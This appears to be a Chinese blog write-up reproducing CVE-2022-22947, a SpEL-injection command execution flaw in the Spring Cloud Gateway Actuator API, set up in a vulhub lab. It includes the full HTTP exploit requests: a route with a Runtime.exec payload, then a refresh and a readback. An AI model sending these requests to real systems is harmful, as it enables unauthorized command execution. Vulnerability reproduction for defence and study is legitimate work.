当前位置：首页 > 漏洞复现 > 正文内容

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

UzJu2年前 (2022-04-16)漏洞复现830

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

一、环境搭建

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
docker-compose up -d

二、漏洞复现

添加一个含有恶意SpEL表达式的路由

POST /actuator/gateway/routes/UzJu HTTP/1.1
Host:  ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 324

{
  "id": "UzJu",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

如果遇到提示Unsupported Media Type

需要加上Content-Type为application/json即可

Content-Type: application/json

刷新网关触发SpEL表达式

POST /actuator/gateway/refresh HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

随后发送如下请求

GET /actuator/gateway/routes/UzJu HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

扫描二维码推送至手机访问。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接：https://uzzju.com/post/31.java

分享给朋友：

返回列表

上一篇：CVE-2021-40438-ApacheSSRF复现

下一篇：Metersphere未授权RCE

Metersphere未授权RCE

一、环境搭建影响范围：MeterSphere v1.13.0 - v1.16.3 可以去releases里面找以前的版本 https://github.com/metersphere/metersphere/releases...

Log4j_2.17.0_RCE复现-CVE-2021-44832

0x00 漏洞复现还是使用Github上大佬的环境 https://github.com/tangxiaofeng7/apache-log4j-poc 不过这个好像已经删掉了:)，还好之前本地存了然后需要改一些配置文件，然...

Grafana8.3.0任意文件读取0day复现

docker pull vulfocus/grafana-read_arbitrary_file:latest 自己搭建环境也可以，然后启动...

UzzzzZ

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

一、环境搭建

二、漏洞复现

相关文章

Metersphere未授权RCE

Log4j_2.17.0_RCE复现-CVE-2021-44832

Grafana8.3.0任意文件读取0day复现

发表评论

Copyright UzJu WebSite.Some Rights Reserved.

Powered By Z-BlogPHP. Theme by TOYEAN.

UzzzzZ

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）

一、环境搭建

二、漏洞复现

相关文章

Metersphere未授权RCE

Log4j_2.17.0_RCE复现-CVE-2021-44832

Grafana8.3.0任意文件读取0day复现

发表评论取消回复

Copyright UzJu WebSite.Some Rights Reserved.var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?2846bdbed26831d2889f621e2af5638d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

发表评论

Copyright UzJu WebSite.Some Rights Reserved.